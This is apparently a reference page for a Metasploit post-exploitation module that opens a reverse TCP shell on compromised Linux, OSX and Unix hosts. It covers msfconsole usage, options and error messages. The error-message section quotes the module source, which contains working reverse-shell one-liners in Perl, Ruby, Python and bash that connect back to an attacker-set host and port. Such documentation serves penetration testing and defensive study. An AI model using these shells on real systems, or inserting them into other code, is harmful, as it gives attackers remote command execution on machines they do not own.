Multi Manage System Remote TCP Shell Session - Metasploit
This page contains detailed information about how to use the post/multi/manage/system_session metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Multi Manage System Remote TCP Shell Session
Module: post/multi/manage/system_session
Source code: modules/post/multi/manage/system_session.rb
Disclosure date: -
Last modification time: 2017-09-22 13:38:06 +0000
Supported architecture(s): -
Supported platform(s): Linux, OSX, Unix
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module will create a Reverse TCP Shell on the target system using the system's own scripting environments installed on the target.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/multi/manage/system_session
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/multi/manage/system_session
msf post(system_session) > show options
... show and set options ...
msf post(system_session) > set SESSION session-id
msf post(system_session) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/multi/manage/system_session")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
SESSION: The session to run this module on.
LHOST: IP of host that will receive the connection from the payload.
Go back to menu.
Msfconsole Usage
Here is how the multi/manage/system_session post exploitation module looks in the msfconsole:
msf6 > use post/multi/manage/system_session
msf6 post(multi/manage/system_session) > show info
Name: Multi Manage System Remote TCP Shell Session
Module: post/multi/manage/system_session
Platform: Linux, OSX, Unix
Arch:
Rank: Normal
Provided by:
Carlos Perez <[email protected]>
Compatible session types:
Meterpreter
Shell
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER false yes Start an exploit/multi/handler to receive the connection
LHOST yes IP of host that will receive the connection from the payload.
LPORT 4433 no Port for Payload to connect to.
SESSION yes The session to run this module on.
TYPE auto yes Scripting environment on target to use for reverse shell (Accepted: auto, ruby, python, perl, bash)
Description:
This module will create a Reverse TCP Shell on the target system
using the system's own scripting environments installed on the
target.
Module Options
This is a complete list of options available in the multi/manage/system_session post exploitation module:
msf6 post(multi/manage/system_session) > show options
Module options (post/multi/manage/system_session):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER false yes Start an exploit/multi/handler to receive the connection
LHOST yes IP of host that will receive the connection from the payload.
LPORT 4433 no Port for Payload to connect to.
SESSION yes The session to run this module on.
TYPE auto yes Scripting environment on target to use for reverse shell (Accepted: auto, ruby, python, perl, bash)
Advanced Options
Here is a complete list of advanced options supported by the multi/manage/system_session post exploitation module:
msf6 post(multi/manage/system_session) > show advanced
Module advanced options (post/multi/manage/system_session):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the multi/manage/system_session module can do:
msf6 post(multi/manage/system_session) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the multi/manage/system_session post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(multi/manage/system_session) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
- No scripting environment found with which to create a remote reverse TCP Shell with.
- Job <CURRENT_ID> is listening on IP <CURRENT_LHOST> and port <CURRENT_LPORT>
- Could not start handler!
- A job is listening on the same Port
- No scripting environment found for the selected type.
- No scripting environment found for the selected type.
- No scripting environment found for the selected type.
- No scripting environment found for the selected type.
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
No scripting environment found with which to create a remote reverse TCP Shell with.
Here is a relevant code snippet related to the "No scripting environment found with which to create a remote reverse TCP Shell with." error message:
82: elsif cmd_exec("bash --version") =~ /GNU bash/
83: print_status("Bash was found on target")
84: cmd = bash_session(lhost,lport)
85: vprint_status("Running #{cmd}")
86: else
87: print_error("No scripting environment found with which to create a remote reverse TCP Shell with.")
88: end
89:
90: return cmd
91: end
92:
Job <CURRENT_ID> is listening on IP <CURRENT_LHOST> and port <CURRENT_LPORT>
Here is a relevant code snippet related to the "Job <CURRENT_ID> is listening on IP <CURRENT_LHOST> and port <CURRENT_LPORT>" error message:
98: if j.name =~ / multi\/handler/
99: current_id = j.jid
100: current_lhost = j.ctx[0].datastore["LHOST"]
101: current_lport = j.ctx[0].datastore["LPORT"]
102: if lhost == current_lhost and lport == current_lport.to_i
103: print_error("Job #{current_id} is listening on IP #{current_lhost} and port #{current_lport}")
104: conflict = true
105: end
106: end
107: end
108: return conflict
Could not start handler!
Here is a relevant code snippet related to the "Could not start handler!" error message:
130: 'LocalInput' => self.user_input,
131: 'LocalOutput' => self.user_output,
132: 'RunAsJob' => true
133: )
134: else
135: print_error("Could not start handler!")
136: print_error("A job is listening on the same Port")
137: end
138: end
139:
140: # Perl reverse TCP Shell
A job is listening on the same Port
Here is a relevant code snippet related to the "A job is listening on the same Port" error message:
131: 'LocalOutput' => self.user_output,
132: 'RunAsJob' => true
133: )
134: else
135: print_error("Could not start handler!")
136: print_error("A job is listening on the same Port")
137: end
138: end
139:
140: # Perl reverse TCP Shell
141: def perl_session(lhost,lport)
No scripting environment found for the selected type.
Here is a relevant code snippet related to the "No scripting environment found for the selected type." error message:
142: if cmd_exec("perl -v") =~ /Larry/
143: print_status("Perl reverse shell selected")
144: cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET " +
145: "(PeerAddr,\"#{lhost}:#{lport}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
146: else
147: print_error("No scripting environment found for the selected type.")
148: cmd =""
149: end
150: return cmd
151: end
152:
No scripting environment found for the selected type.
Here is a relevant code snippet related to the "No scripting environment found for the selected type." error message:
155: if cmd_exec("ruby -v") =~ /revision/i
156: print_status("Ruby reverse shell selected")
157: return "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"#{lhost}\",\"#{lport}\");" +
158: "while(cmd=c.gets);begin;IO.popen(cmd,\"r\"){|io|c.print io.read};rescue;end;end'"
159: else
160: print_error("No scripting environment found for the selected type.")
161: cmd =""
162: end
163: return cmd
164: end
165:
No scripting environment found for the selected type.
Here is a relevant code snippet related to the "No scripting environment found for the selected type." error message:
169: print_status("Python reverse shell selected")
170: return "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET," +
171: "socket.SOCK_STREAM);s.connect((\"#{lhost}\",#{lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);" +
172: "os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
173: else
174: print_error("No scripting environment found for the selected type.")
175: cmd =""
176: end
177: return cmd
178: end
179:
No scripting environment found for the selected type.
Here is a relevant code snippet related to the "No scripting environment found for the selected type." error message:
181: def bash_session(lhost,lport)
182: if cmd_exec("bash --version") =~ /GNU bash/
183: print_status("Bash reverse shell selected")
184: return "bash -c 'nohup bash -i >& /dev/tcp/#{lhost}/#{lport} 0>&1'"
185: else
186: print_error("No scripting environment found for the selected type.")
187: cmd =""
188: end
189: return cmd
190: end
191: end
Go back to menu.
Related Pull Requests
- #8974 Merged Pull Request: spelling/grammar fixes part 4. Finished.
- #8336 Merged Pull Request: Specify lhost by interface name
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #5629 Merged Pull Request: Fix #3951: Use cmd_exec on "Windows::Registry"
- #5527 Merged Pull Request: Fix inconstancy - multi/handler
- #2525 Merged Pull Request: Change module boilerplate
- #2417 Merged Pull Request: Prefer Ruby style for single word collections
- #2304 Merged Pull Request: Fix load order in posts, hopefully forever
- #1241 Merged Pull Request: Removed all $Id$ and $Revision$ occurences
- #1110 Merged Pull Request: Fix instances of invalid lower-case datastore use
Go back to menu.
See Also
Check also the following modules related to this module:
- post/multi/manage/autoroute
- post/multi/manage/dbvis_add_db_admin
- post/multi/manage/dbvis_query
- post/multi/manage/fileshare
- post/multi/manage/hsts_eraser
- post/multi/manage/multi_post
- post/multi/manage/open
- post/multi/manage/play_youtube
- post/multi/manage/record_mic
- post/multi/manage/screensaver
- post/multi/manage/screenshare
- post/multi/manage/set_wallpaper
- post/multi/manage/shell_to_meterpreter
- post/multi/manage/sudo
- post/multi/manage/upload_exec
- post/multi/manage/zip
Authors
- Carlos Perez <carlos_perez[at]darkoperator.com>
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.
